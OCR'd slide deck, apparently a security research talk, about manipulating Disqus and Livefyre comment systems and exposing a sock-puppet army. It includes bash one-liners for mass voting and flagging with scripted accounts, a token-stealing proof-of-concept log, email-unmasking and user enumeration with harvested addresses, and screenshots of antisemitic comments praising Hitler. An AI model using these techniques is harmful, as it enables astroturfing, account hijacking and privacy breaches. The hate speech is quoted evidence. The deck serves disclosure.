"userprefix%g" 1 100;do echo "curl -b \"${i}.cookies\" -d 
Y , post=${post}&vote=${vote}&api_key=${API_KEY}Y , http:// 
disqus.com/api/3.0/posts/vote.json”:done :)|parallel 




Mass downvote: 



export post="postid M ;export vote="-1 (for i in 'seq -f 
"userprefix%g" 1 100';do echo "curl -b \"${i}.cookies\" -d 
\”post=${post}&vote=${vote}&api_key=${API_KEY}\” 
http://disqus.com/api/3.0/posts/vote.json M :done:)| 
parallel 

• Bonus: Flag posts to temporarily make them disappear 

export post="postid"; (for i in seq -f M userprefix%g" 1 
1 00';do echo "curl -b \"${i}.cookies\" -d \”post=${post} 
&api_key=${API_KEY}\” http://disqus.eom/api/3.0/posts/ 
report.json ":done:)|parallel 
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Pretty much complete control of 

Disqus forums 
(with 1 line of bash script) 
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Wut? 
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User registration fisn’t IP-limited that we’ve 
encountered 

Email verification isn’t a requirement 
Guest voting _is_ IP-limited 
• Open proxy lists bypass this trivially 




ALL OF THE SAME ATTACKS 
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Ainsley Earhardt test drives a 
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Ferrari goes from zero to sixty 



Teens who ran away from home 
to join ISIS want to come home 



PSObama 
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Newest Oldest Hot Threads 



PSObama 

Thanks Obama! Edit (in 6 minutes) 



423 people listening la 



Share ▼ 



Post comment 



just now 



W Delete Share 



Like 



Reply 



boiseboy12 11 minutes ago 

I recommend you read Jeremy Rifkins book "The Third Industrial 
Revolution" about how the Europeans are addressing their energy 
needs, and how it is producing not just power, but a lateral society. 

IBM has created a computer system that coordinates individually 
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Flag as spam 4/5 times to remove 
(try it yourself on fox news :) 
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livefyre: one 



more thing.. 
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^ T tennis.com - Federe. 
^ ® www.tennis.com 
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"There might still be some adjustments to my schedule moving forward. I definitely 
need to play well for that to happen. If I don't play well, I guess I can also play 
everything," he said. 



Expand 



ITENNIS.com 

iTennis 



Federer could reach No. 2 with a good performance in Shanghai. 



Marin Cilic on @ivokarlovic after loss at 
@SHRolexMasters: "He goes all in or 
nothing." READ: bit Jy/Zrpl4b 
pic.twitter.com/r8twKcwSS5 



Before commenting, please read our Posting Gui 
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Edit profile 



Sign out 
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+ Follow 




Share ▼ 


Post comment 



Newest | Oldest | Top Comments 
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Dan Last 

I pretty much doubt that he will skip basel or paris if he does well in Shanghai and could gain 
points on Novak. If he has a chance to end year end No. 1 he will play as much as he can. 



This would be his ultimate achievement, to get back that year end No 1 and he is close, 
considering that Novak may take some time off due to his private situation. 



If Novak wins Shanghai he probably will end up No 1 as his lead over Fed would be at least 
2,000 pts with only about 3,000 pts up for grap for the rest of the season. 



Rafa pretty much has no more chance to end as year end No 1. He would have to win 
everything and hope Novak does not bag more than 1000 points in the 4 events. Given Nadal's 
injury, form and also past history at indoor events I just don't see that. He never won London but 
would have to win all 5 matches at London to get the 1,500 pts needed. 
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I ©Tennis 

Ferrer tumbles, Nishikori improves standing 
in race for ©ATPWorldTour Finals. Read: 
m .ten n i s.com/p ro-g a m e/2 014/... 
p ic .tw itter.com/PxCMfk9 Rvy 
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I ©Tennis 

Roger returns to the tour in Shanghai. 
©SteveTignor breaks down the draw in 
Week in Preview: 
tennis.com/pro-game/2014/... 
pic.twitter.com/Jy8vZuuukn 
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Latest blog post: Scr New 
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Sep 23, 2014 

Like Reply 

Sep 23, 2014 



Like Reply 





iv)user@ubuntu :~/livefyre$ python poc-tokensteal. py 
Running on http://127. 0.0. 1:5000/ 

Restarting with reloader 

.0.0.1 - - [07/Oct/2014 01:18:36] "GET / HTTP/1.1" 200 - 

.0.0.1 - - [07/Oct/2014 01:18:42] "GET /script. js HTTP/1.1" 200 - 

.0.0.1 - - [07/Oct/2014 01:18:42] "GET /favicon. ico HTTP/1. 1" 404 - 

.0.0.1 - - [07/Oct/2014 01:18:42] "GET /favicon. ico HTTP/1.1" 404 - 

Got token (eyJhb..) 

Posted comment (ok) 

.0.0.1 - - [07/Oct/2014 01:19:03] "GET /Iftoken/eyJhbGciOiAiSFMyNTYiLCAidHlwI jogIkpXVC39.ey3kb21haW4i 
0OTgsICJlc2VyX2lkI jogIl91cDY2NDY30DUyIn0.CwvDr6oXnzld0P8rch4- jzfU4jqR2VNVdzsLbkopAD0?r=elwslnel31w HT 



GET /Iftoken/eyJhbGciOiAiSFM 




D www.newrepublic.com/artide/119551/what-catalan-independence-and-spain-can-learn-scottish-referendum 



6 comments 

Sign in 



12 people listening 




f (3) (3 + Follow e; Share ▼ Post comment as... 

Newest Oldest Top Comments 



iiornialiiser4 just now 

"We are told about the world before we see it. We imagine most things before we 
experience them. And those preconceptions* unless education has made us acutely aw r are, 
govern deeply the whole process of perception." Walter Lippmann, Public Opinion 

H Flag €► Share ^ Like Reply 

TomGrayl 



From the article: 
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Palestine in Chile 



HamBaconEggs • 7 months ago 



wgenrgenr@gmail.com 



'The jew cries out in pain as he strikes you.’ -Polish proverb 



DeShawn S. 



Williams 



Pro- White/Black, anti -jew 




I Palestine in Chile 

HamBaconEggs • 7 months ago ergengekr@gmail.com 

If you don't like what you see here, Shlomo, then go hide in your synagogue and study Talmud a 
day. Progressives, among others, are sick and tired of Zionist jews committing heinous crimes a 
then using their disproportionate financial and media control to justify or underwrite them. The ci 
of "anti-Semitism" is just a way to shut up those who call you out on your tactics. Time to stop 
acting as though you're better than the "goyim." You're no better than anyone else; indeed, a 
majority of your tribe have proven themselves far worse. 



Join Date: Mar 2009 
Location: il 
Posts: 1,468 



HamBaconEggs 4 Guest • 10 months ago 

Just imagine how many millions of people would have been saved from the scourge 
of Judeo-imperialist wars and Jewish financial predations had Hitler actually finished | 
the job. 
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Remember: 



We discovered that flagging 
posts got them killed? 
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IDF 

Saturday at 12:10 PM 




Please help us by marking any antisemitic 
and anti Israeli comments as spam! 

434 Likes 86 Comments 



■* Like P Comment Share 




Will you help? 




JTRIG 
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http://en.wikipedia.org/wiki/Joint Threat Research Intelligence Group 




























EFFECTS* Drftnition 






'Using online techniques to make something 
happen in the real or cyber world'* 



Two broad categories: 



Information Ops (Influence or disruption) 
Technical disruption 






Known In GCHQ as< mine .'overt ction 



The 4 D s 



















THE//INTERCEPT 



FEATURES GREENWALD FROOMKIN DOCUMENTS STAFF CONTACT // 



ooo 







DOCUMENT 


PACES 



Zoom 



I I i 



V-. 



Swamp is a tool that will silently locate all predefined types of file and encrypt them on a targets 

donkey machine. 



TORNADO is a delivery method (Excel Spreadsheet) that can silently extract and run an executable 
ALLEY on a target s machine 



UNDERPASS Change outcome of online polls (previously known as NUBILO) 




li m i tations 

Ready to fire (but 
see target 
restnctions). 

Ready to fire (but 
see target 
restnctions). 



[Tech Lead Section 
In development X. Expert User 





VIPERS 

TONGUE 



Ready to fire (but 

is a tool that will silently Denial of Seivice calls on a Satellite Phone or a GSM Phone see target 



WARPATH Mass delivery of SMS messages to support an Information Operations campaign 

[edit] Work Flow Management 



restnctions). 
Ready to fire 



[Tech Lead 
Expert User | 

jtrig oso: 




UNDERPASS Change outcome of online polls (previously known as NUBILO) 



In development. 





Disqus seems ripe for the picking. 
So we went looking active armies. 
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Most commented thread on 
CNN’s highest voted comment 



46324 Comments CNN 


^ clickerl t 


Sort by Best t Sh< 


are Favorite ★ 


Mimi Satterlee 3 months ago 




| 1 wish you a speedy and full recovery from your condition. 





Thanks Son. 




Most commented thread on 




/ 




recover 



V * SilS 




Approach 
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Pick slightly controversial topic 
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Pick news orgs that cover this 

topic 
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ALJAZEERA 
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Then 



Use Disqus API to get a list of popular stories 
For each story, use the API to pull user info 
Link users to stories they commented on 



and... 




SETEC REAL WOOF CRETS 






Cue a bunch of similar 
attempts to look at the data 





Decided to focus on voting 
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Voting metric 



Pull all comments for random story. 

For each comment pull the non-guest voters. 

For each voter retrieve their registration time. 
Calculate the variation in voter age on each comment. 




Variation 
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What stood out 



Accounts had been registered within minutes of each 
other. 

Their usernames and profile names had a regular 
pattern: 

• Username: <FirstnamexSurname> 

• Profile name: <Firstname> <Surname> 




(venv)abbot : maltego marco$ python unmask. py 

Disqus Unmasker 

marco@thinkst.com 



-v 2919407889 1540287681 like 



[*] Looking up comment 1540287681 

[*] Looking up voters on comment 1540287681 

NatalyaMcalpin - Natalya Mcalpin (109616253) 2014-06-05T17:46:08 117d 
NerissaNiel - Nerissa Niel (109616261) 2014-06-05T17:46:13 117d 
OdessaOgilvie - Odessa Ogilvie (109616307) 2014-06-05T17 : 46 : 32 117d 
PaigeSwanger - Paige Swanger (109616327) 2014-06-05T17:46:42 117d 
PaulinaPrivett - Paulina Privett (109616340) 2014-06-05T17 : 46 : 48 117d 
RandaBallance - Randa Ballance (109616381) 2014-06-05T17 : 47 : 07 117d 
RodgerRansom - Rodger Ransom (109616473) 2014-06-05T17:47:41 117d 
RogerReddix - Roger Reddix (109616481) 2014-06-05T17:47:46 117d 
SorayaPiotrowski - Soraya Piotrowski (109616699) 2014-06-05T17 : 49 : 34 117d 
TeriClerk - Teri Clerk (109616781) 2014-06-05T17:50:07 117d 
TerinaTurrell - Terina Turrell (109616790) 2014-06-05T17 : 50 : 13 117d 
ThaoMcanulty - Thao Mcanulty (109616811) 2014-06-05T17:50:22 117d 
TyrellTennyson - Tyrell Tennyson (109616851) 2014-06-05T17:50:40 117d 
VertieValliere - Valliere (109616881) 2014-06-05T17:50:54 117d 



ULotjuo.i ny^.i l \j£-t v 
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.23:58 55d 



disqus_0xkykFPm7E - TheTruth (117719302) 2014-08- 11T00: 45: 34 50d 



Guests Likes: 23 
(venv)abbot: maltego marco$ | 




Not exactly convincing 
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What about their emails 

addresses? 

(Hint: you really shouldn’t be able to retrieve a Disqus 

user’s email address) 
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We found an unmask attack that 
returns an email address for a 

profile name* 
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*Already reported and fixed 




Supposed puppets had emails 

in the form: 

<Firstname><Surname>@amail.com 
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We had our suspicions, but thought 
the puppet army would be larger. 

Time to enumerate. 




thinkst 

applied research 




User Enumeration 



Disqus users get a unique ID 
This ID is a counter (yay!) 

There are unrestricted APIs to query user information (yay! yay!) 

• https://disqus.eom/api/3.0/users/details.json 

We can lookup email addresses for each enumerated user with our 
unmask attack (yay! yay! yay!) 

So we pick a lower and upper bound beyond the lowest and highest 
known puppet IDs, making a range of 5k users. 



Pull details for all users. 




5k users. Now what? 



Filter on known values: 

• Must have username, name and email patterns, and 
not be verified. 

• Age is already taken into account with the ID, so less 
relevant. 




marco@playpen:~$ grep gmail.com users-109614253-109618253.txt I grep ' . *([A-Z][A-Za-z]\+).*' I 

7.09% 109614827 : AlainaDartez@gmail.com (AlainaDartez) 117 2014-06-05T17: 35:45 

7.44% 109614840 : AleciaAxley@gmail.com (AleciaAxley) 117 2014-06-05T17:35:49 

7.71% 109614850 : AleshaHepner@gmail.com (AleshaHepner) 117 2014-06-05T17 : 35 : 54 

7.90% 109614857 : AllynAlfrey@gmail.com (AllynAlfrey) 117 2014-06-05117:35:58 

8.17% 109614867 : AlmaArmwood@gmail.com (AlmaArmwood) 117 2014-06-05117:36:03 

8.49% 109614879 : AlvinNolan@gmail.com (AlvinNolan) 117 2014-06-05117:36:07 

8.85% 109614892 : AmadoGorman@gmail.com (AmadoGorman) 117 2014-06-05117:36:12 

9.12% 109614902 : AngelinaCrespo@gmail.com (AngelinaCrespo) 117 2014-06-05117:36:17 

9.47% 109614915 : AngelynAleman@gmail.com (AngelynAleman) 117 2014-06-05117:36:22 

9.74% 109614925 : AntoinetteAlcorn@gmail.com (AntoinetteAlcorn) 117 2014-06-05117:36:27 

10.06% 109614937 : ArdenApril@gmail.com (ArdenApril^ 117 2014-06-05117:36:32 

10.22% 109614943 : BeatrizBuchholtz@gmail . com (BeatrizBuchholtz) 117 2014-06-05117:36:37 

10.49% 109614953 : BelvaSeckman@gmail.com (BelvaSeckman) 117 2014-06-05117:36:42 

10.79% 109614964 : BriceBosket@gmail.com (BriceBosket) 117 2014-06-05117:36:46 

11.06% 109614974 : BrookePlate@gmail.com (BrookePlate) 117 2014-06-05117:36:50 

11.36% 109614985 : BryannaCallanan@gmail . com (BryannaCallanan) 117 2014-06-05117:36:55 

11.63% 109614995 : CarmanComan@gmail.com CCarmanComan) 117 2014-06-05117:36:59 

11.85% 109615003 : CatarinaCountryman@gmail . com (CatarinaCountryman) 117 2014-06-05117:37:04 

12.01% 109615009 : CherelleCostner@gmail.com (CherelleCostner) 117 2014-06-05117:37:08 

12.33% 109615021 : ChristeenChien@gmail.com (ChristeenChien) 117 2014-06-05117:37:13 

12.58% 109615030 : ChristelDecola@gmail.com (ChristelDecola) 117 2014-06-05117:37:17 

12.82% 109615039 : ChrystalCryan@gmail.com (ChrystalCryan) 117 2014-06-05117:37:22 

13.20% 109615053 : CicelyCorrell@gmail.com (CicelyCorrell) 117 2014-06-05117:37:26 

13.52% 109615065 : ClarineChavarria@gmail . com (ClarineChavarria) 117 2014-06-05117:37:32 

13.90% 109615079 : ClarineHeeren@gmail.com (ClarineHeeren) 117 2014-06-05117:37:37 

14.25% 109615092 : aetaEvans@gmail.com (CletaEvans) 117 2014-06-05117:37:42 

14.66% 109615107 : ConnieCola@gmail.com (ConnieCola) 117 2014-06-05117:37:48 
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So Far 



Accounts with 

• Patterned profile names 

• Patterned usernames 

• Patterned emails 

• Similar registration times 

• Regular inter-registration delays 

• Alphabetical progression in usernames 




Disqus lets us map usernames 
to forums where they’re active 
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Jerusalem Post (297) 



AJ English (1077) 




CNN (5647) 




Dtsqus Username ■ Disqus Forum Name 



Disqus also lets us map 
usernames to comments* 
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*lncluding “Private” profiles 




t 


i 


& 


i 


& 
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TeraTaveras 


OnitaStrahan 


TheolaBach 


RodgerRansom 


YajairaSaia 


PaulinaPrivett 





<p>There no hasbaRats defending the indefensible i 
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So 



• Accounts with 

• Patterned profile names 

• Patterned usernames 

• Patterned emails 

• Similar registration times 

• Regular inter-registration 
delays 

• Alphabetical progression in 
usernames 



Far 



• And 

• Active on the same set of 
sites 

• Shared duplicate 
comments across accounts 

• Vote for each other’s 
comments to push them up 




Puppet army size 



Period of activity 
Comments posted 
Unique comments 



Primary targeted forums 



186 confirmed 



Four months (2014-06-5) 



7269 



5782 (1487 dups) 



CNN, Al Jazeera, 
Jerusalem Post 
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What are they saying? 
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Consistent multi-faceted views 



• Pro-Palestine 

• Anti-Israel 

• Anti-ISIS/L 

• Writes “We (USA)”, presents as Western 

• Anti-Syria 

• Anti-Obama 

• Pro-Islam (Writes “I am Christian and I know that Christianity is worst 
religion in the world” :) 




So who is this? 
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No idea. Anything is pure 

speculation. 
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Ways out? 




Shut down this puppet army 
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£3 https://mail.google.eom/mail/#inbox 




Google 




sorayapiotrowski@gmail.c... 



Gmail - 



] ▼ Q More 



1-3 of 3 < > 0 T 



COMPOSE 



Inbox (1) 
Starred 
Sent Mail 
Drafts 
More^ 



Q Primary 

Disqus Digests 

Disqus 
password (2) 



Social ^ Promotions + 

Top conversations on Al Jazeera English - Disqus Settings Explore other aw* Oct 2 

Re: New comment posted on ISIL under heavy assault by Kurds in Iraq - Disqus Oct 1 

Disqus Password Reset Confirmation - Hi SorayaPiotrowski, You have recently Oct 1 



Soraya 



Q, 





£3 https://disqus.com/home/inbox 




DISQUS * 




• • • 
• • • 
• • • 



O 



Notifications 0 



All 



Aboubakr and 4 others upvoted you on ISIL under heavy assault by Kurds in Iraq • a day ago 



Pending 



SorayaPiotrowski • 2 days ago 

Congratulations 0 muslims on the advent of the auspicious occasion of Bid (Saturday) as well as the. 



^ Replies 



Bruisse upvoted you on Arabs in Israel decry racial discrimination • 2 days ago 



c ni i«Aiii/>l/i 
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Disqus limiting their API. 
(This would be a bad idea.) 




thinkst 

applied research 




Puppetry is very likely happening in other 
places. 

But without the same amount of data, we 
can’t tell. 

Disqus’ open data approach is great for 
identifying these relationships and patterns, 
and we want to give them shouts for it. 



(But fix the unmask attacks.) 




Summary 
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Without exception, all of the UGC sites 
we have looked at have proven to be fairly 
trivial to manipulate 

It is clear that this abuse is already taking 
place on many of them 

• Be aware of it; 

• Build tools to help deal with it; 
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